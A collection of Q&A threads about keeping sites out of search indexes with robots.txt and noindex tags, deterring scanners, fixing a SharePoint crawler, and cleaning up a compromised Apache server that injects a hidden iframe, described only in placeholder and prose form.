How to avoid google indexing my site under development is completed - seo

I have a new site and a new domain, will take about 2 months to complete development and then will go live. Only then I want google starts crawling and indexing my site.
So the question is how to "shut off" google indexing for these 2 months before going live?
Right now I plan to use this index.html:
<html>
<meta name="googlebot" content="noindex">
UNDER CONSTRUCTION
</html>
I will start development in index.php, when done I will remove index.html, then googlebot will start indexing starting from index.php.
Don't know if this sounds like a good plan.

You can create robots.txt in your project directory and add following to it:
User-agent: *
Disallow: /
So when a bot reaches your page it first checks robots.txt file and if disallow is there it would crawl your pages. Read more about it here

Related

How to Stop automated scanners from scanning the website Leaving the robots.txt Any other way Configuration can be made?

Do anyone knows how to stop Automated Scanners from Scanning the Web Application or website ?
Leaving the robots.txt Any other way Configuration can be made?
Any server side
modification?
You can add a /robots.txt file that can ask scanners nicely not to scan all or parts of your site. Most legitimate search engine robots follow the instructions you put in robots.txt
For example:
User-agent: *
Disallow: /api/
If you want to be more fancy pants, you can add a http get on /api/ that normal browsers won't access. Your application HTML may access /api/customers and /api/suppliers but never /api/ for example.
When an automated scanner reads /api/, you can reject any further requests from that IP for 10 minutes. It may help a little.
A Web Application Firewall like OWASP ModSecurity may also help

Test my website online

How can I test my website online (before it is public) and that no one can see it except me?
I know I can add a password but I don't want that google indexs it (before it's really public).
To prevent google from indexing it, use this meta tag in your head:
<meta name="robots" content="noindex,nofollow" />
This tells search engines you do not wish for your page to show up in the search results.
Add a robots.txt file to your website.
User-agent: *
Disallow: /
Save the text above into a text file called robots.txt, and upload it to your website root.
By using this, any well-behaved crawler will not read your website, and any well-behaved search engine not index your website.
Depending on how your website is designed (PHP, Python, Ruby), you would have to establish a web server. The most typical configuration is AMP, which stands for Apache, MySQL, and PHP/Python. (Typically this runs atop Linux, but it can be run under Windows too.)
Ruby on Rails comes with its own built-in web server. Most Python web frameworks (Django, CherryPy, Pylons) do too.

Apache attack on compromised server, iframe injected by string replace

My server has been compromised recently. This morning, I have discovered that the intruder is injecting an iframe into each of my HTML pages. After testing, I have found out that the way he does that is by getting Apache (?) to replace every instance of
<body>
by
<iframe link to malware></iframe></body>
For example if I browse a file residing on the server consisting of:
</body>
</body>
Then my browser sees a file consisting of:
<iframe link to malware></iframe></body>
<iframe link to malware></iframe></body>
I have immediately stopped Apache to protect my visitors, but so far I have not been able to find what the intruder has changed on the server to perform the attack. I presume he has modified an Apache config file, but I have no idea which one. In particular, I have looked for recently modified files by time-stamp, but did not find anything noteworthy.
Thanks for any help.
Tuan.
PS: I am in the process of rebuilding a new server from scratch, but in the while, I would like to keep the old one running, since this is a business site.
I don't know the details of your compromised server. While this is a fairly standard drive-by attack against Apache that you can, ideally, resolve by rolling back to a previous version of your web content and server configuration (if you have a colo, contact the technical team responsible for your backups), let's presume you're entirely on your own and need to fix the problem yourself.
Pulling from StopBadware.org's documentation on the most common drive-by scenarios and resolution cases:
Malicious scripts
Malicious scripts are often used to redirect site visitors to a
different website and/or load badware from another source. These
scripts will often be injected by an attacker into the content of your
web pages, or sometimes into other files on your server, such as
images and PDFs. Sometimes, instead of injecting the entire script
into your web pages, the attacker will only inject a pointer to a .js
or other file that the attacker saves in a directory on your web
server.
Many malicious scripts use obfuscation to make them more difficult for
anti-virus scanners to detect:
Some malicious scripts use names that look like they’re coming from
legitimate sites (note the misspelling of “analytics”):
.htaccess redirects
The Apache web server, which is used by many hosting providers, uses a
hidden server file called .htaccess to configure certain access
settings for directories on the website. Attackers will sometimes
modify an existing .htaccess file on your web server or upload new
.htaccess files to your web server containing instructions to redirect
users to other websites, often ones that lead to badware downloads or
fraudulent product sales.
Hidden iframes
An iframe is a section of a web page that loads content from another
page or site. Attackers will often inject malicious iframes into a web
page or other file on your server. Often, these iframes will be
configured so they don’t show up on the web page when someone visits
the page, but the malicious content they are loading will still load,
hidden from the visitor’s view.
How to look for it
If your site was reported as a badware site by Google, you can use
Google’s Webmaster Tools to get more information about what was
detected. This includes a sampling of pages on which the badware was
detected and, using a Labs feature, possibly even a sample of the bad
code that was found on your site. Certain information can also be
found on the Google Diagnostics page, which can be found by replacing
example.com in the following URL with your own site’s URL:
www.google.com/safebrowsing/diagnostic?site=example.com
There exist several free and paid website scanning services on the
Internet that can help you zero in on specific badware on your site.
There are also tools that you can use on your web server and/or on a
downloaded copy of the files from your website to search for specific
text. StopBadware does not list or recommend such services, but the
volunteers in our online community will be glad to point you to their
favorites.
In short, use the stock-standard tools and scanners provided by Google first. If the threat can't otherwise be identified, you'll need to backpath through the code of your CMS, Apache configuration, SQL setup, and remaining content of your website to determine where you were compromised and what the right remediation steps should be.
Best of luck handling your issue!

FAST Search for Sharepoint Crawler issue with Dokuwiki pages

My level of frustion is maxxing out over crawling Dokuwiki sites.
I have a content source using FAST search for SharePoint that i have set up to crawl a dokuwiki/doku.php site. My crawler rules are set to: http://servername/* , match case and include all items in this path with crawl complex urls.. testing the content source in the crawl rules shows that it will be crawled by the crawler. However..... The crawl always last for under 2 minutes and completes having only crawled the page I pointed to and no other link on that page. I have check with the Dokuwki admin and he has the robots text set to allow. when I look at the source on the pages I see that it says
meta name="robots" content="index,follow"
so in order to test that the other linked pages were not a problem, I added those links to the content souce manually and recrawled.. example source page has three links
site A
site B
site C.
I added Site A,B and C urls to the crawl source. The results of this crawl are 4 successes, the primary souce page and the other links A,B, and C i manually added.
So my question is why wont the crawler crawl the link on the page? is this something I need to do with the crawler on my end or is it something to do with how namespaces are defined and links constructed with Dokuwiki?
Any help would be appreciated
Eric
Did you disable the delayed indexing options and rel=nofollow options?
The issue was around authentication even though no issues were reported suggesting it was authentication in the FAST Crawl Logs.
The fix was adding a $freepass setting for the IP address of the Search indexing server so that Appache would not go through the authentication process for each page hit.
Thanks for the reply
Eric

Stop Google from Indexing files from our second server

I'm actually scouring the web for the right terms for this question but after a few hours I decided to post my question here.
The scenario is:
we have a website running on two servers. So the files/website is synchronized in these two servers. We have a second server for internal purposes. Let's name the first server as www and ww2 for the second server. ww2 is automatically updated once the files are updated in www.
Now, Google is indexing the ww2 which I want to stop and just let www be crawled and indexed. My questions are:
1. How can I removed those crawled pages in ww2 removed from Google index?
2. How can I stop google from indexing ww2?
Thanks guys!
You can simply use robots.txt to disallow indexing. And there is a robots meta tag obeyed by google.
For your first question Google has a removal tool in their Webmaster tools here is a more info about it Remove page or site from Google's search results
For the second question you either can use a robots.txt file to block Google from crawling your site (here is a more info Blocking Google) or you can restrict the access to that server